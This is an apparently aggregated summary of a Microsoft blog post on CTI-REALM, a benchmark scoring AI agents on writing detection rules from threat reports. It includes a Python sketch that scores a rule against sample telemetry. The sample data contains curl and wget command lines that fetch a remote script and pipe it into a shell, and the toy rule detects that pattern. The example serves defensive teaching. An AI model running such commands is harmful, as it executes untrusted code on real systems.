CTI-REALM: A new benchmark for end-to-end detection rule generation with AI agents
Summary
CTI-REALM is an open-source benchmark from Microsoft that evaluates AI agents on end-to-end detection engineering: turning cyber threat intelligence (CTI) reports into validated detection rules (KQL queries and Sigma rules) that can catch attacks in real environments. Unlike existing benchmarks that only test whether AI can answer trivia about threats, CTI-REALM tests whether agents can do what security analysts actually do: read threat reports, explore system data, write and refine queries, and produce working detection logic. That logic is scored against real attack telemetry across Linux, Azure Kubernetes Service (AKS), and Azure cloud platforms.
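To make "scored against real attack telemetry" concrete, here is a minimal Python sketch of how a detection rule could be scored against labeled events. It is an illustration only: this summary does not describe CTI-REALM's actual scoring method, and the `Event` fields, the `score_rule` helper, the toy rule, and the sample events are all hypothetical.

```python
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class Event:
    """One telemetry record. Fields are hypothetical, not CTI-REALM's schema."""
    process: str
    command_line: str
    is_attack: bool  # ground-truth label, e.g. from a simulated attack


def score_rule(rule: Callable[[Event], bool], events: Iterable[Event]) -> dict:
    """Compute precision, recall, and F1 for a rule over labeled events."""
    tp = fp = fn = 0
    for event in events:
        fired = rule(event)
        if fired and event.is_attack:
            tp += 1  # rule fired on a real attack event
        elif fired:
            fp += 1  # rule fired on benign activity
        elif event.is_attack:
            fn += 1  # rule missed an attack event
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"precision": precision, "recall": recall, "f1": f1}


def suspicious_curl_pipe(event: Event) -> bool:
    """Toy rule (assumption): flag curl output piped into a shell."""
    return event.process == "curl" and "| sh" in event.command_line


# Hand-made sample telemetry, for illustration only.
events = [
    Event("curl", "curl http://example.test/a.sh | sh", True),
    Event("curl", "curl https://example.test/health", False),
    Event("wget", "wget http://example.test/b.sh -O- | sh", True),
    Event("curl", "curl http://example.test/install.sh | sh", False),
]

result = score_rule(suspicious_curl_pipe, events)
print(result)
```

On this sample the toy rule catches one attack, misses the wget variant, and fires once on benign activity. That is the kind of gap an agent would be expected to close by exploring the data and refining its query.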
Original source: https://www.microsoft.com/en-us/security/blog/2026/03/20/cti-realm-a-new-benchmark-for-end-to-end-detection-rule-generation-with-ai-agents/
First tracked: March 20, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 85%